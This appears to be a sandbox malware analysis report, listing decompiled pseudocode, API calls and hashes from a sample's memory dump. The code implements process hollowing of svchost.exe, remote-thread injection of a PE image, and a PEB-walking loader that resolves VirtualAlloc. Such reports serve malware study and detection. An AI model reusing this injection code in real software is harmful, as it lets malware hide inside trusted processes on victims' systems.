                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_400000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: CriticalSection$EnterErrorLastLeaveValue
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 682475483-0
                                                                                                                                                                                                                                                                          • Opcode ID: b0d1a973718a68e77ae23a23f47d086d7b5acdbac98e9d8a1e001a8f832c1e7e
                                                                                                                                                                                                                                                                          • Instruction ID: d59e870dec7d302afa92fc910524551bdf3aec598eae15ddc7b5345af43b2dbe
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b0d1a973718a68e77ae23a23f47d086d7b5acdbac98e9d8a1e001a8f832c1e7e
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 28F0AD716046109BCF10BFE59A89A9F77E8EE04318B0000BEE840B32C1E3B899048AED
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          C-Code - Quality: 90%
                                                                                                                                                                                                                                                                          			E04001F80(intOrPtr _a4, signed char _a8, intOrPtr _a12) {
                                                                                                                                                                                                                                                                          				long _v8;
                                                                                                                                                                                                                                                                          				void* _v12;
                                                                                                                                                                                                                                                                          				char _v276;
                                                                                                                                                                                                                                                                          				struct _CONTEXT _v996;
                                                                                                                                                                                                                                                                          				struct _PROCESS_INFORMATION _v1012;
                                                                                                                                                                                                                                                                          				intOrPtr _v1016;
                                                                                                                                                                                                                                                                          				struct _STARTUPINFOA _v1092;
                                                                                                                                                                                                                                                                          				intOrPtr _v1096;
                                                                                                                                                                                                                                                                          				void _v1100;
                                                                                                                                                                                                                                                                          				signed int _v1104;
                                                                                                                                                                                                                                                                          				void* _t121;
                                                                                                                                                                                                                                                                          				void* _t128;
                                                                                                                                                                                                                                                                          				int _t130;
                                                                                                                                                                                                                                                                          				void* _t132;
                                                                                                                                                                                                                                                                          				int _t140;
                                                                                                                                                                                                                                                                          				int _t143;
                                                                                                                                                                                                                                                                          				int _t145;
                                                                                                                                                                                                                                                                          				int _t148;
                                                                                                                                                                                                                                                                          				void* _t180;
                                                                                                                                                                                                                                                                          				void* _t263;
                                                                                                                                                                                                                                                                          				void* _t265;
                                                                                                                                                                                                                                                                          				void* _t266;
                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                          				if(_a4 == 0) {
                                                                                                                                                                                                                                                                          					L26:
                                                                                                                                                                                                                                                                          					return 0;
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          				GetEnvironmentVariableA("SystemRoot",  &_v276, 0x104);
                                                                                                                                                                                                                                                                          				_t121 =  *0x400304c( &_v276, "\\system32\\svchost.exe");
                                                                                                                                                                                                                                                                          				if(_a12 != 0) {
                                                                                                                                                                                                                                                                          					 *0x400304c( &_v276, " ");
                                                                                                                                                                                                                                                                          					_t121 =  *0x400304c( &_v276, _a12);
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          				E04001260(_t121,  &_v1012, 0, 0x10);
                                                                                                                                                                                                                                                                          				E04001260( &_v1092,  &_v1092, 0, 0x44);
                                                                                                                                                                                                                                                                          				_t265 = _t263 + 0x18;
                                                                                                                                                                                                                                                                          				_v1092.cb = 0x44;
                                                                                                                                                                                                                                                                          				_v1096 = _a4 +  *((intOrPtr*)(_a4 + 0x3c));
                                                                                                                                                                                                                                                                          				_v1016 = _v1096 + ( *(_v1096 + 0x14) & 0x0000ffff) + 0x18;
                                                                                                                                                                                                                                                                          				_v8 =  *((intOrPtr*)(_v1096 + 0x50));
                                                                                                                                                                                                                                                                          				_t128 = VirtualAlloc(0, _v8, 0x3000, 0x40); // executed
                                                                                                                                                                                                                                                                          				_v12 = _t128;
                                                                                                                                                                                                                                                                          				if(_v12 != 0) {
                                                                                                                                                                                                                                                                          					_t130 = CreateProcessA(0,  &_v276, 0, 0, 0, 4, 0, 0,  &_v1092,  &_v1012); // executed
                                                                                                                                                                                                                                                                          					if(_t130 != 0) {
                                                                                                                                                                                                                                                                          						_t132 = VirtualAllocEx(_v1012.hProcess,  *(_v1096 + 0x34), _v8, 0x3000, 0x40); // executed
                                                                                                                                                                                                                                                                          						_v1100 = _t132;
                                                                                                                                                                                                                                                                          						if(_v1100 != 0) {
                                                                                                                                                                                                                                                                          							L10:
                                                                                                                                                                                                                                                                          							E04001310(_v12, _a4,  *((intOrPtr*)(_v1096 + 0x54)));
                                                                                                                                                                                                                                                                          							_t266 = _t265 + 0xc;
                                                                                                                                                                                                                                                                          							_v1104 = 0;
                                                                                                                                                                                                                                                                          							while(_v1104 < ( *(_v1096 + 6) & 0x0000ffff)) {
                                                                                                                                                                                                                                                                          								if((_a8 & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                          									E04001310(_v12 +  *((intOrPtr*)(_v1016 + 0xc + _v1104 * 0x28)), _a4 +  *((intOrPtr*)(_v1016 + 0xc + _v1104 * 0x28)),  *((intOrPtr*)(_v1016 + 0x10 + _v1104 * 0x28)));
                                                                                                                                                                                                                                                                          									_t266 = _t266 + 0xc;
                                                                                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                                                                                          									E04001310(_v12 +  *((intOrPtr*)(_v1016 + 0xc + _v1104 * 0x28)), _a4 +  *((intOrPtr*)(_v1016 + 0x14 + _v1104 * 0x28)),  *((intOrPtr*)(_v1016 + 0x10 + _v1104 * 0x28)));
                                                                                                                                                                                                                                                                          									_t266 = _t266 + 0xc;
                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                          								_v1104 = _v1104 + 1;
                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                          							E04001C00(_v12, _v1100);
                                                                                                                                                                                                                                                                          							_t140 = WriteProcessMemory(_v1012.hProcess, _v1100, _v12, _v8, 0); // executed
                                                                                                                                                                                                                                                                          							if(_t140 != 0) {
                                                                                                                                                                                                                                                                          								VirtualFree(_v12, 0, 0x8000); // executed
                                                                                                                                                                                                                                                                          								_v996.ContextFlags = 0x10007;
                                                                                                                                                                                                                                                                          								_t143 = GetThreadContext(_v1012.hThread,  &_v996); // executed
                                                                                                                                                                                                                                                                          								if(_t143 != 0) {
                                                                                                                                                                                                                                                                          									_t145 = WriteProcessMemory(_v1012.hProcess, _v996.Ebx + 8,  &_v1100, 4, 0); // executed
                                                                                                                                                                                                                                                                          									if(_t145 != 0) {
                                                                                                                                                                                                                                                                          										_v996.Eax = _v1100 +  *((intOrPtr*)(_v1096 + 0x28));
                                                                                                                                                                                                                                                                          										_t148 = SetThreadContext(_v1012.hThread,  &_v996); // executed
                                                                                                                                                                                                                                                                          										if(_t148 == 0) {
                                                                                                                                                                                                                                                                          											TerminateProcess(_v1012.hProcess, 0);
                                                                                                                                                                                                                                                                          											CloseHandle(_v1012.hThread);
                                                                                                                                                                                                                                                                          											CloseHandle(_v1012.hProcess);
                                                                                                                                                                                                                                                                          											goto L26;
                                                                                                                                                                                                                                                                          										}
                                                                                                                                                                                                                                                                          										ResumeThread(_v1012.hThread); // executed
                                                                                                                                                                                                                                                                          										return _v1012.hProcess;
                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                          									TerminateProcess(_v1012.hProcess, 0);
                                                                                                                                                                                                                                                                          									CloseHandle(_v1012.hProcess);
                                                                                                                                                                                                                                                                          									CloseHandle(_v1012.hThread);
                                                                                                                                                                                                                                                                          									return 0;
                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                          								TerminateProcess(_v1012.hProcess, 0);
                                                                                                                                                                                                                                                                          								CloseHandle(_v1012.hProcess);
                                                                                                                                                                                                                                                                          								CloseHandle(_v1012.hThread);
                                                                                                                                                                                                                                                                          								return 0;
                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                          							TerminateProcess(_v1012.hProcess, 0);
                                                                                                                                                                                                                                                                          							CloseHandle(_v1012.hProcess);
                                                                                                                                                                                                                                                                          							CloseHandle(_v1012.hThread);
                                                                                                                                                                                                                                                                          							VirtualFree(_v12, 0, 0x8000);
                                                                                                                                                                                                                                                                          							return 0;
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          						_t180 = VirtualAllocEx(_v1012.hProcess, 0, _v8, 0x103000, 0x40); // executed
                                                                                                                                                                                                                                                                          						_v1100 = _t180;
                                                                                                                                                                                                                                                                          						if(_v1100 != 0) {
                                                                                                                                                                                                                                                                          							goto L10;
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          						TerminateProcess(_v1012.hProcess, 0);
                                                                                                                                                                                                                                                                          						CloseHandle(_v1012);
                                                                                                                                                                                                                                                                          						CloseHandle(_v1012.hThread);
                                                                                                                                                                                                                                                                          						VirtualFree(_v12, 0, 0x8000);
                                                                                                                                                                                                                                                                          						return 0;
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					VirtualFree(_v12, 0, 0x8000);
                                                                                                                                                                                                                                                                          					return 0;
                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                          					return 0;
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          			}

























                                                                                                                                                                                                                                                                          0x04001f8d
                                                                                                                                                                                                                                                                          0x040023d2
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x040023d2
                                                                                                                                                                                                                                                                          0x04001fa4
                                                                                                                                                                                                                                                                          0x04001fb6
                                                                                                                                                                                                                                                                          0x04001fc0
                                                                                                                                                                                                                                                                          0x04001fce
                                                                                                                                                                                                                                                                          0x04001fdf
                                                                                                                                                                                                                                                                          0x04001fdf
                                                                                                                                                                                                                                                                          0x04001ff0
                                                                                                                                                                                                                                                                          0x04002003
                                                                                                                                                                                                                                                                          0x04002008
                                                                                                                                                                                                                                                                          0x0400200b
                                                                                                                                                                                                                                                                          0x0400201e
                                                                                                                                                                                                                                                                          0x04002038
                                                                                                                                                                                                                                                                          0x04002047
                                                                                                                                                                                                                                                                          0x04002057
                                                                                                                                                                                                                                                                          0x0400205d
                                                                                                                                                                                                                                                                          0x04002064
                                                                                                                                                                                                                                                                          0x04002090
                                                                                                                                                                                                                                                                          0x04002098
                                                                                                                                                                                                                                                                          0x040020ce
                                                                                                                                                                                                                                                                          0x040020d4
                                                                                                                                                                                                                                                                          0x040020e1
                                                                                                                                                                                                                                                                          0x0400214d
                                                                                                                                                                                                                                                                          0x0400215f
                                                                                                                                                                                                                                                                          0x04002164
                                                                                                                                                                                                                                                                          0x04002167
                                                                                                                                                                                                                                                                          0x04002182
                                                                                                                                                                                                                                                                          0x0400219e
                                                                                                                                                                                                                                                                          0x0400222e
                                                                                                                                                                                                                                                                          0x04002233
                                                                                                                                                                                                                                                                          0x040021a0
                                                                                                                                                                                                                                                                          0x040021e2
                                                                                                                                                                                                                                                                          0x040021e7
                                                                                                                                                                                                                                                                          0x040021e7
                                                                                                                                                                                                                                                                          0x0400217c
                                                                                                                                                                                                                                                                          0x0400217c
                                                                                                                                                                                                                                                                          0x04002246
                                                                                                                                                                                                                                                                          0x04002266
                                                                                                                                                                                                                                                                          0x0400226e
                                                                                                                                                                                                                                                                          0x040022bc
                                                                                                                                                                                                                                                                          0x040022c2
                                                                                                                                                                                                                                                                          0x040022da
                                                                                                                                                                                                                                                                          0x040022e2
                                                                                                                                                                                                                                                                          0x04002330
                                                                                                                                                                                                                                                                          0x04002338
                                                                                                                                                                                                                                                                          0x04002376
                                                                                                                                                                                                                                                                          0x0400238a
                                                                                                                                                                                                                                                                          0x04002392
                                                                                                                                                                                                                                                                          0x040023b2
                                                                                                                                                                                                                                                                          0x040023bf
                                                                                                                                                                                                                                                                          0x040023cc
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x040023cc
                                                                                                                                                                                                                                                                          0x0400239b
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x040023a1
                                                                                                                                                                                                                                                                          0x04002343
                                                                                                                                                                                                                                                                          0x04002350
                                                                                                                                                                                                                                                                          0x0400235d
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04002363
                                                                                                                                                                                                                                                                          0x040022ed
                                                                                                                                                                                                                                                                          0x040022fa
                                                                                                                                                                                                                                                                          0x04002307
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x0400230d
                                                                                                                                                                                                                                                                          0x04002279
                                                                                                                                                                                                                                                                          0x04002286
                                                                                                                                                                                                                                                                          0x04002293
                                                                                                                                                                                                                                                                          0x040022a4
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x040022aa
                                                                                                                                                                                                                                                                          0x040020f7
                                                                                                                                                                                                                                                                          0x040020fd
                                                                                                                                                                                                                                                                          0x0400210a
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04002115
                                                                                                                                                                                                                                                                          0x04002122
                                                                                                                                                                                                                                                                          0x0400212f
                                                                                                                                                                                                                                                                          0x04002140
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04002146
                                                                                                                                                                                                                                                                          0x040020a5
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04002066
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04002066

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • GetEnvironmentVariableA.KERNEL32(SystemRoot,?,00000104), ref: 04001FA4
                                                                                                                                                                                                                                                                          • lstrcat.KERNEL32(?,\system32\svchost.exe), ref: 04001FB6
                                                                                                                                                                                                                                                                          • lstrcat.KERNEL32(?,0400317C), ref: 04001FCE
                                                                                                                                                                                                                                                                          • lstrcat.KERNEL32(?,00000000), ref: 04001FDF
                                                                                                                                                                                                                                                                          • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 04002057
                                                                                                                                                                                                                                                                          • CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?), ref: 04002090
                                                                                                                                                                                                                                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 040020A5
                                                                                                                                                                                                                                                                          • VirtualAllocEx.KERNELBASE(?,?,?,00003000,00000040), ref: 040020CE
                                                                                                                                                                                                                                                                          • VirtualAllocEx.KERNELBASE(?,00000000,?,00103000,00000040), ref: 040020F7
                                                                                                                                                                                                                                                                          • TerminateProcess.KERNEL32(?,00000000), ref: 04002115
                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 04002122
                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 0400212F
                                                                                                                                                                                                                                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 04002140
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000A.00000002.563207738.0000000004000000.00000040.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 0000000A.00000002.563207738.000000000408A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_4000000_svchost.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Virtual$Alloclstrcat$CloseFreeHandleProcess$CreateEnvironmentTerminateVariable
                                                                                                                                                                                                                                                                          • String ID: D$SystemRoot$\system32\svchost.exe
                                                                                                                                                                                                                                                                          • API String ID: 1819736980-1559310322
                                                                                                                                                                                                                                                                          • Opcode ID: 036fed23e7ee821a2f18e3afc8e3bbde1b7bb66371f9036d2a87dc4e59fe086b
                                                                                                                                                                                                                                                                          • Instruction ID: 1d4488b5fdb617a131862b70200c6806e4887f475a197b4823290bb3b9e97252
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 036fed23e7ee821a2f18e3afc8e3bbde1b7bb66371f9036d2a87dc4e59fe086b
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 07D13EB1A00215ABDB29CF54DC94FAEB7B9FB48704F0485D8F709A7280D678AE80CF55
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                                                                          			E04001DC0(void* _a4, intOrPtr _a8) {
                                                                                                                                                                                                                                                                          				long _v8;
                                                                                                                                                                                                                                                                          				long _v12;
                                                                                                                                                                                                                                                                          				void* _v16;
                                                                                                                                                                                                                                                                          				intOrPtr _v20;
                                                                                                                                                                                                                                                                          				intOrPtr _v24;
                                                                                                                                                                                                                                                                          				long _v28;
                                                                                                                                                                                                                                                                          				void* _v32;
                                                                                                                                                                                                                                                                          				signed int _v36;
                                                                                                                                                                                                                                                                          				void* _t75;
                                                                                                                                                                                                                                                                          				void* _t78;
                                                                                                                                                                                                                                                                          				int _t85;
                                                                                                                                                                                                                                                                          				void* _t90;
                                                                                                                                                                                                                                                                          				void* _t138;
                                                                                                                                                                                                                                                                          				void* _t139;
                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                          				_v8 = 0;
                                                                                                                                                                                                                                                                          				if(_a4 == 0 || _a8 == 0) {
                                                                                                                                                                                                                                                                          					L14:
                                                                                                                                                                                                                                                                          					return _v8;
                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                          					_v24 = _a8 +  *((intOrPtr*)(_a8 + 0x3c));
                                                                                                                                                                                                                                                                          					_v20 = _v24 + ( *(_v24 + 0x14) & 0x0000ffff) + 0x18;
                                                                                                                                                                                                                                                                          					_v12 =  *((intOrPtr*)(_v24 + 0x50));
                                                                                                                                                                                                                                                                          					_t75 = VirtualAlloc(0, _v12, 0x3000, 0x40); // executed
                                                                                                                                                                                                                                                                          					_v16 = _t75;
                                                                                                                                                                                                                                                                          					if(_v16 != 0) {
                                                                                                                                                                                                                                                                          						_t78 = VirtualAllocEx(_a4,  *(_v24 + 0x34), _v12, 0x3000, 0x40); // executed
                                                                                                                                                                                                                                                                          						_v32 = _t78;
                                                                                                                                                                                                                                                                          						if(_v32 != 0) {
                                                                                                                                                                                                                                                                          							L7:
                                                                                                                                                                                                                                                                          							E04001310(_v16, _a8,  *((intOrPtr*)(_v24 + 0x54)));
                                                                                                                                                                                                                                                                          							_t139 = _t138 + 0xc;
                                                                                                                                                                                                                                                                          							_v36 = 0;
                                                                                                                                                                                                                                                                          							while(_v36 < ( *(_v24 + 6) & 0x0000ffff)) {
                                                                                                                                                                                                                                                                          								E04001310(_v16 +  *((intOrPtr*)(_v20 + 0xc + _v36 * 0x28)), _a8 +  *((intOrPtr*)(_v20 + 0x14 + _v36 * 0x28)),  *((intOrPtr*)(_v20 + 0x10 + _v36 * 0x28)));
                                                                                                                                                                                                                                                                          								_t139 = _t139 + 0xc;
                                                                                                                                                                                                                                                                          								_v36 = _v36 + 1;
                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                          							E04001C00(_v16, _v32);
                                                                                                                                                                                                                                                                          							_t85 = WriteProcessMemory(_a4, _v32, _v16, _v12, 0); // executed
                                                                                                                                                                                                                                                                          							if(_t85 != 0) {
                                                                                                                                                                                                                                                                          								VirtualFree(_v16, 0, 0x8000); // executed
                                                                                                                                                                                                                                                                          								_v28 = 0;
                                                                                                                                                                                                                                                                          								_t90 = CreateRemoteThread(_a4, 0, 0, _v32 +  *((intOrPtr*)(_v24 + 0x28)), 0x11, 0,  &_v28); // executed
                                                                                                                                                                                                                                                                          								_v8 = _t90;
                                                                                                                                                                                                                                                                          								goto L14;
                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                          							VirtualFree(_v16, 0, 0x8000);
                                                                                                                                                                                                                                                                          							return 0;
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          						_v32 = VirtualAllocEx(_a4, 0, _v12, 0x103000, 0x40);
                                                                                                                                                                                                                                                                          						if(_v32 != 0) {
                                                                                                                                                                                                                                                                          							goto L7;
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          						VirtualFree(_v16, 0, 0x8000);
                                                                                                                                                                                                                                                                          						return 0;
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					return 0;
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          			}

















                                                                                                                                                                                                                                                                          0x04001dc6
                                                                                                                                                                                                                                                                          0x04001dd1
                                                                                                                                                                                                                                                                          0x04001f72
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04001de1
                                                                                                                                                                                                                                                                          0x04001dea
                                                                                                                                                                                                                                                                          0x04001dfb
                                                                                                                                                                                                                                                                          0x04001e04
                                                                                                                                                                                                                                                                          0x04001e14
                                                                                                                                                                                                                                                                          0x04001e1a
                                                                                                                                                                                                                                                                          0x04001e21
                                                                                                                                                                                                                                                                          0x04001e40
                                                                                                                                                                                                                                                                          0x04001e46
                                                                                                                                                                                                                                                                          0x04001e4d
                                                                                                                                                                                                                                                                          0x04001e87
                                                                                                                                                                                                                                                                          0x04001e96
                                                                                                                                                                                                                                                                          0x04001e9b
                                                                                                                                                                                                                                                                          0x04001e9e
                                                                                                                                                                                                                                                                          0x04001eb0
                                                                                                                                                                                                                                                                          0x04001eec
                                                                                                                                                                                                                                                                          0x04001ef1
                                                                                                                                                                                                                                                                          0x04001ead
                                                                                                                                                                                                                                                                          0x04001ead
                                                                                                                                                                                                                                                                          0x04001efe
                                                                                                                                                                                                                                                                          0x04001f18
                                                                                                                                                                                                                                                                          0x04001f20
                                                                                                                                                                                                                                                                          0x04001f42
                                                                                                                                                                                                                                                                          0x04001f48
                                                                                                                                                                                                                                                                          0x04001f69
                                                                                                                                                                                                                                                                          0x04001f6f
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04001f6f
                                                                                                                                                                                                                                                                          0x04001f2d
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04001f33
                                                                                                                                                                                                                                                                          0x04001e66
                                                                                                                                                                                                                                                                          0x04001e6d
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04001e7a
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04001e80
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04001e23

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000040), ref: 04001E14
                                                                                                                                                                                                                                                                          • VirtualAllocEx.KERNELBASE(00000000,?,00000000,00003000,00000040), ref: 04001E40
                                                                                                                                                                                                                                                                          • VirtualAllocEx.KERNEL32(00000000,00000000,00000000,00103000,00000040), ref: 04001E60
                                                                                                                                                                                                                                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 04001E7A
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000A.00000002.563207738.0000000004000000.00000040.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 0000000A.00000002.563207738.000000000408A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_4000000_svchost.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Virtual$Alloc$Free
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 3668210933-0
                                                                                                                                                                                                                                                                          • Opcode ID: 52cf3d6ea764938bff9b522e6c342b7d46ced791a51747c70ce413cfb71456e5
                                                                                                                                                                                                                                                                          • Instruction ID: 690ccb563e0dd82574d8c7baf9c5524f022716bcc7e01862e985cdb9dd94f491
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 52cf3d6ea764938bff9b522e6c342b7d46ced791a51747c70ce413cfb71456e5
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B451FAB5E00209AFDB04CF94C895FAEB7B5FB48704F10C558FA05BB280D779AA41CBA0
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                          control_flow_graph 131 401005-40107e LoadLibraryExA GetProcAddress call 401126 136 401083-401099 GetPEB 131->136
                                                                                                                                                                                                                                                                          C-Code - Quality: 25%
                                                                                                                                                                                                                                                                          			E00401005() {
                                                                                                                                                                                                                                                                          				void* _t20;
                                                                                                                                                                                                                                                                          				void* _t42;
                                                                                                                                                                                                                                                                          				void* _t43;
                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                          				_pop(_t42);
                                                                                                                                                                                                                                                                          				_t43 = _t42 - 5;
                                                                                                                                                                                                                                                                          				_t1 = _t43 + 0x85; // 0x401085
                                                                                                                                                                                                                                                                          				_t20 =  *_t1();
                                                                                                                                                                                                                                                                          				_t2 = _t43 + 0x29ab9; // 0x42aab9
                                                                                                                                                                                                                                                                          				_t3 = _t43 + 0x9a; // 0x40109a
                                                                                                                                                                                                                                                                          				 *((intOrPtr*)(_t43 + 0x29af1)) =  *_t3(_t20, _t2);
                                                                                                                                                                                                                                                                          				_t5 = _t43 + 0x29ac8; // 0x42aac8
                                                                                                                                                                                                                                                                          				 *(_t43 + 0x29af5) = LoadLibraryExA(_t5, 0, 0);
                                                                                                                                                                                                                                                                          				_t8 = _t43 + 0x29ad5; // 0x42aad5
                                                                                                                                                                                                                                                                          				_t9 = _t43 + 0x29af5; // 0x74640000
                                                                                                                                                                                                                                                                          				_t10 = _t43 + 0x9a; // 0x40109a
                                                                                                                                                                                                                                                                          				 *((intOrPtr*)(_t43 + 0x29af9)) =  *_t10( *_t9, _t8);
                                                                                                                                                                                                                                                                          				_t12 = _t43 + 0x29ae4; // 0x42aae4
                                                                                                                                                                                                                                                                          				_t13 = _t43 + 0x29af5; // 0x74640000
                                                                                                                                                                                                                                                                          				 *((intOrPtr*)(_t43 + 0x29afd)) = GetProcAddress( *_t13, _t12);
                                                                                                                                                                                                                                                                          				_t16 = _t43 + 0x2b9; // 0x4012b9
                                                                                                                                                                                                                                                                          				E00401126(_t16, _t43); // executed
                                                                                                                                                                                                                                                                          				asm("lodsd");
                                                                                                                                                                                                                                                                          				return  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 8));
                                                                                                                                                                                                                                                                          			}






                                                                                                                                                                                                                                                                          0x00401005
                                                                                                                                                                                                                                                                          0x00401006
                                                                                                                                                                                                                                                                          0x0040100c
                                                                                                                                                                                                                                                                          0x00401012
                                                                                                                                                                                                                                                                          0x00401014
                                                                                                                                                                                                                                                                          0x0040101c
                                                                                                                                                                                                                                                                          0x00401024
                                                                                                                                                                                                                                                                          0x0040102a
                                                                                                                                                                                                                                                                          0x0040103b
                                                                                                                                                                                                                                                                          0x00401041
                                                                                                                                                                                                                                                                          0x00401048
                                                                                                                                                                                                                                                                          0x0040104e
                                                                                                                                                                                                                                                                          0x00401056
                                                                                                                                                                                                                                                                          0x0040105c
                                                                                                                                                                                                                                                                          0x00401063
                                                                                                                                                                                                                                                                          0x00401070
                                                                                                                                                                                                                                                                          0x00401077
                                                                                                                                                                                                                                                                          0x0040107e
                                                                                                                                                                                                                                                                          0x00401094
                                                                                                                                                                                                                                                                          0x00401099

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • LoadLibraryExA.KERNELBASE(kernel32.dll,00000000,00000000), ref: 00401035
                                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(74640000,VirtualAlloc), ref: 0040106A
                                                                                                                                                                                                                                                                            • Part of subcall function 00401126: VirtualAlloc.KERNELBASE(?,?,00003000,00000040), ref: 00401144
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000A.00000002.558761324.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_svchost.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: AddressAllocLibraryLoadProcVirtual
                                                                                                                                                                                                                                                                          • String ID: GetProcAddress$LoadLibraryExA$VirtualAlloc$kernel32.dll
                                                                                                                                                                                                                                                                          • API String ID: 4074058790-1482053243
                                                                                                                                                                                                                                                                          • Opcode ID: bfa598e39201ea56365d01237002b764d44595e1bff33a7ec6927efc10a0c0ef
                                                                                                                                                                                                                                                                          • Instruction ID: 4ff399170a710021cd26f301060e842f1d9714487b9385cbdeed3e88436b29f7
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bfa598e39201ea56365d01237002b764d44595e1bff33a7ec6927efc10a0c0ef
